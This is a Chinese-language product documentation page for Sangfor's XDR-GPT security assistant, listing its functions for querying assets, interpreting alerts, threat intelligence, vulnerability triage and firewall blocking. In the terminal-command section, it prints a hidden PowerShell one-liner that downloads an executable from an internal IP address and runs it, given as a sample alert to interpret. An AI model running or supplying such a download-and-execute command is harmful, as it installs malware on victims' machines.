更新时间:2024-08-12
XDR-GPT概述
- 当前GPT技术正在塑造各行各业,深信服一直以来也非常重视技术创新和应用,为了积极拥抱技术变革,深信服一直以来积极研究并利用AI技术提升网络安全能力,以缩小与发达国家之间的网络安全产业差距。
- 近期深信服正在研发网络安全垂直领域的安全GPT,其定位是包含在深信服XDR产品(服务)中的一个安全智能助手,它采集来自用户侧的数十万台深信服安全设备上报的经过匿名化处理后的海量网络安全威胁数据,以及其他合法来源的网络安全百科知识等进行预训练,,日志、攻击威胁流量、安全事件与告警日志,以及其他合法来源的海量安全百科知识和其他IT语料库来进行预训练,最后经过深信服安全专家的模型微调和强化训练后,得到网络安全垂直领域的GPT模型,可以实现多种网络安全任务,网络安全管理人员可以通过自然语言与安全GPT交互,协助管理员完成包括流量研判、事件解析、日志关联、安全建议生成、安全威胁检测等复杂的网络安全任务。
主打价值
- 通过GPT辅助驾驶全面赋能安全运营的全生命周期(资产漏洞治理、威胁检测发现、告警事件闭环、处置调查、总结汇报)的关键job,提升系统安全能力,将日常安全运营所花费的时间减少95%;
关键价值
1.消除繁琐、紧迫的运营工作,减少92%需要多次手动操作的job;
2.人员、流程和技术融合,降低系统安全运营维护程碑,提升系统安全能力;
原理描述
深信服大模型预训练和微调安全日志,事件或告警等语料库,泛化并归类生成流量研判,安全检测,事件解析等多种类型的任务。客户通过前端询问,大模型理解查询,并转换为批处理命令或查询语句,调用xdr,edr,云端情报库等数据源获取原始数,然后经过自然语言转换呈现给前端。下面以脆弱性漏洞解读流程图为例,说明辅助驾驶自然语言处理原理:
关键指标
产品模块 |
依赖环境 |
能力 |
能力边界 |
注意事项 |
GPT模块(辅助研判) |
XDR内部有资产的数据切已经配置的详细内容 |
资产查询和统计 |
支持查询内网当中的资产分布情况查询、查询特定IP地址的资产信息 |
|
GPT与XDR联动正常 |
HTTP告警数据包解读 |
支持页面输入数据包内容、基于N侧的告警进入该功能;数据包解读会基于内容、输出该数据包是否为恶意,攻击手法的剖析,攻击特征的内容; |
|
GPT与XDR联动正常、无异常,可联网 |
威胁情报解读 |
可以查询特定IP地址、URL的情报信息;可反馈对应的情报查询的结果、图文实现; |
|
XDR内有资产存在漏洞的数据 |
漏洞预警、排查与闭环 |
统计特定漏洞在内网当中的资产分布情况、比如哪些主机存在log4j的漏洞 |
|
告警数据不为空 |
安全告警统计筛选 |
可以从告警名称、攻击IP、资产IP、攻击方向、处置状态等维度进行告警的查询、统计; |
|
GPT与XDR联动正常 |
安全事件的解读与查询 |
总结安全事件的概述,自然语言的方式完成告警的总结 |
|
GPT与XDR联动正常 |
攻击IP调查 |
查询特定IP地址、攻击过内网哪些主机; |
|
GPT与XDR联动正常 平台告警数据不为空 |
特定时间内安全趋势的总结 |
能够总结一段时间内的安全趋势,包含资产变化、安全告警、安全事件,有图文并茂的呈现; 时间周期:最近1个月、半个月、最近7天的时间周期,时间跨度需要在半年内, |
|
GPT与XDR联动正常、无异常,可联网 |
安全百科知识解读 |
支持查询基础的漏洞名称、特定的攻击手法、黑客工具、安全专有名称等内容;部分有歧义的通用名称、可能无法识别 |
|
GPT与XDR联动正常 |
告警命令行解读 |
可以基于对话框输入命令行、基于IOA安全告警进入该功能;可以解读命令行的结果、可以基于结果进行能力的追问; |
|
GPT与XDR联动正常、无异常,可联网 |
恶意文件解读 |
可以基于对话框输入命令行、基于IOA安全告警进入该功能;需要输入完整的md5,明确恶意的能够返回对应解读内容和恶意性;正常的文件、仅有结果无更多内容; |
|
XDR与AF联动正常,GPT与XDR联动正常
|
文字联动深信服AF进行封堵
|
可以基于对话框输入需要封禁的地址,实现联动防火墙进行对威胁IP地址进行封堵。
|
|
使用入口:
安全GPT助手悬浮窗:登录XDR设备,点击左侧核心功能栏目(如监控总览、安全事件处理、安全告警处理等),找到界面右侧机器人悬浮窗,点击进入安全GPT助手对话框。
安全GPT助手对话框:可通过自然语言的形式输入您的问题与安全GPT进行交互;产品内置了<智能解读>、<场景化调查>、<智能查询与汇报>、<处置响应>等各类安全场景的使用引导,可通过点击对应的安全场景模块,更高效完成调查、总结、封堵等。
核心功能
资产查询和统计
- 通过将XDR接入EDR、NDR的产品或与用户侧的CMDB系统对接,安全GPT可以实现以下功能,使资产管理更加便捷和高效。
- 安全GPT提供了对话框式的查询界面,让用户能够对现有网络内的资产进行多维度的统计和查询。您可以根据不同的字段和属性进行查询,例如特定开放的端口、资产的责任人、资产的类型、不同的区域等多个维度,以满足各种查询需求。安全GPT支持多种输出方式,包括MarkDown、表格和饼图。您可以根据需要选择适合的输出格式,以便更好地呈现查询结果。对于查询到的数据,安全GPT能够以自然语言的方式进行描述和总结,使您更容易理解和解读查询结果。这种自然语言描述功能有助于更深入地了解资产情况并做出相应的决策。
- 安全GPT使资产管理变得更加便捷和直观,帮助您更好地了解和掌握现有网络中的资产信息。无论是定位责任人还是进行多维度的统计和查询,安全GPT将为您提供强大的支持和便利。
安全事件解读与查询
- 用户可以在对话框中查询安全事件的列表,并根据事件的危害等级进行排查整理。这使用户能够快速获取关于安全事件的概览信息,并按照危害等级对事件进行有效分类和处理。通过安全事件页面的按钮或事件ID触发,用户可以进一步获取事件的详细解读。安全GPT以故事线和自然语言的方式进行讲述,帮助用户清晰地了解当前事件的来龙去脉。这种详细解读有助于用户深入了解事件的背景、原因和影响,为用户提供全面的上下文信息,以便更好地做出决策和采取相应的行动。
- 安全GPT为用户提供了方便的安全事件查询和详细解读工具。用户可以通过对话框查询事件列表并进行排查整理,同时通过故事线和自然语言的解读方式,深入了解事件的背景和细节。无论是获取事件概览信息还是详细解读,安全GPT将为用户提供强大的功能和便捷的使用体验
告警解读
- 安全GPT提供了强大的解读功能,让用户能够更好地理解和解读安全告警。通过我们安全告警分析页面安全告警下的<GPT解读>按钮可以快捷对该告警进行自动解读,并以自然语言的方式呈现,我们致力于提供清晰、简洁的解读,帮助用户准确理解告警的含义。
终端命令行解读
- 目前安全GPT支持对终端命令行的告警进行解读、辅助安全人员更好的看懂终端、EDR的安全告警;
powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&cmd /c .\\ascotbe.exe
恶意文件分析解读
- 目前安全GPT支持分析恶意文件、并支持虚拟执行并返回专家解读的效果;并支持将结果导出pdf文件;
- 比如可以进行提问:解读一下恶意文件a7452cbc08dc30a139eba09b1ae70b04
威胁情报解读
- 安全GPT产品提供了强大的功能,特别是在IOC情报类告警方面。我们的系统利用深入的安全知识和云端的情报分析能力,能够对威胁情报进行全面的分析提供了多个维度的分析结果,包括威胁情报的活跃程度、恶意性、网络信息、家族信息、活跃地区、入库时间、活跃行业和标签等。
- 安全GPT以自然语言+图片+链接的方式表达结果,提供清晰、丰富的描述,使用户能够轻松理解威胁情报的特征和属性,确保用户准确把握威胁情报的重要细节。
漏洞预警、排查与闭环
- 安全GPT功能清单包括以下特性,旨在提供全面的漏洞管理和修复支持。
- 通过自然语言方式,您可以查询特定漏洞的危害、原理等背景信息,帮助您做出决策。
- 结合XDR内的数据,安全GPT可以对全网的资产进行漏洞排查,并将存在特定漏洞的资产与相关字段关联起来,实现漏洞的梳理和资产管理的全面性。
- 您还可以排查与漏洞相关的安全告警,并进行统计分析。
- 对于特定漏洞,我们提供两个以上的修复方案,包括修复方法、修复补丁链接和缓解措施,帮助您选择适合您环境的修复策略。
- 安全GPT支持以表格和Markdown方式展示漏洞信息,让您根据需要灵活展示和共享数据。
安全告警统计筛选
- 安全GPT提供了以下功能,旨在提供便捷的告警查询、统计分析和相关数据的查看。用户可以通过对话框的方式查询特定时间范围内的告警,并进行统计分析。查询统计的维度包括安全告警名称、危害程度、主机IP、攻击类型、受害者IP、端+网、告警来源等字段,帮助用户全面了解告警情况和分析趋势。
- 安全GPT支持以Markdown表格等方式进行输出,便于用户展示查询结果。输出的表格包含告警ID,并支持点击,方便快速查看详细信息。用户还可以通过告警ID查询攻击数据包,查看攻击IP的情报信息,以及查询受害者资产的相关信息。这些功能使用户能够深入了解攻击事件,提供更全面的上下文和相关数据,以便做出决策和采取相应的行动。
- 安全GPT为您提供了便捷的告警查询和分析工具,帮助您全面了解网络安全状况,并及时采取措施应对潜在的威胁。无论是查询统计告警、输出表格形式的结果,还是查看攻击数据包和相关资产信息。
攻击IP调查
- 安全GPT提供全面的攻击调查和威胁情报查询功能。用户可以通过支持以攻击者IP进行调查,查找攻击者IP曾经攻击过的内网其他资产,并关联对应资产的责任人、部门等信息。这有助于用户追溯攻击路径,识别受到攻击的资产,并与相关责任人建立联系,提高应对攻击事件的效率和准确性。同时,我们的产品支持以表格和Markdown的方式展示查询结果,方便用户根据需要选择合适的展示方式,便于查看和分享。此外,我们提供详细的攻击IP威胁情报信息,包括活跃程度、区域、标签、攻击意图、攻击时间、网络标签等,使用自然语言表达,并提供与行业标杆相媲美的效果样例。这使用户能够全面了解攻击IP的威胁特征,更好地评估和应对安全风险。
特定时间内安全趋势的总结
- 我们的安全GPT产品提供了强大的功能,可以帮助用户统计一段时间内的安全趋势情况。借助我们深入掌握的安全知识和数据分析能力,我们能够支持告警、事件、资产等多维度数据的统计,包括总数、趋势变化以及新增数据。此外,我们的安全GPT能够对资产类型和告警类型进行详尽的分析,以提供全面的数据视角。
- 除了统计功能,我们的安全GPT还具备总结当前趋势变化情况的能力。通过综合分析和比对统计结果,我们能够准确总结当前安全态势的变化,帮助用户快速了解安全状况。
- 为了更好地展示查询结果数据,我们的安全GPT支持以柱状图和趋势图的形式进行可视化展示。这种直观明了的可视化方式,使用户能够直接观察和分析数据,更好地理解安全趋势的变化。我们致力于为用户提供高质量的安全GPT产品功能,助力用户深入了解安全态势,为决策提供有力支持。
安全百科知识解读
- 安全GPT产品具备丰富的安全知识,堪比多年经验的安全专家。无论是针对攻击手法、黑客工具名称,还是关于安全制度、安全标准、网络安全名词等方面的问题,我们的产品都能够提供准确而全面的答案。通过深度学习和自然语言处理技术,我们的安全GPT已经积累了大量的安全知识,能够以类比于经验丰富的安全专家的方式进行回答。用户可以依靠我们的产品获取及时的安全信息和专业的解答,进一步加强对安全领域的理解和提升应对能力。
- 例1:比如进行提问:什么是webshell上传攻击,请举例说明一下,以代码的方式举例?安全GPT会结合更多的安全知识、代码、描述等内容进行全方位的解读与分析;
- 例2:比如进行提问:什么是软件供应链攻击、有哪些具体发生过的案例
-
- 也可以继续进行追问,详细说明一下“SolarWinds”的软件供应链攻击事件?
文字联动防火墙进行封堵
- 安全GPT支持通过自然语言的方式对深信服防火墙下发封堵指令,以实现高效快捷的联动处置,及时遏制高危攻击。